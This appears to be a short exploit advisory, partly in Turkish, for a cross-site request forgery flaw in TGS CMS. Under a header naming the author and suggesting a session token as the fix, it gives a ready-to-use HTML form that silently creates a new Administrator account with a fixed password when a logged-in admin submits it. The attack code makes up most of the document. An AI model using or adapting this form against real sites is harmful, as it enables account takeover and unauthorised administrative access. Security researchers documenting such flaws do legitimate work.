< ------------------- header data start ------------------- >

#############################################################

# Application Name : TGS CMS

# vulnerable Type : XSRF

# Infection : Yeni Admin Eklenebilir !

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# author : Bug Researchers/_iLLeqaL_

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form action=http://demo.opensourcecms.com/tgs/cms/index.php?site=usermanager&option=add method=post name=useradd>
<input type=hidden name=username STYLE=width: 230px value=XSRF></td></tr>
<input type=hidden name=email STYLE=width: 230px value=[email protected]></td></tr>
<input type=hidden name=usertype value=Administrator>
<input type=hidden name=password STYLE=width: 230px value=123456></td></tr>
<input type=hidden name=password_confirm STYLE=width: 230px value=123456></td></tr>
<input type=submit name=adduser value=Tamam>
</form>

< -- bug code end of -- >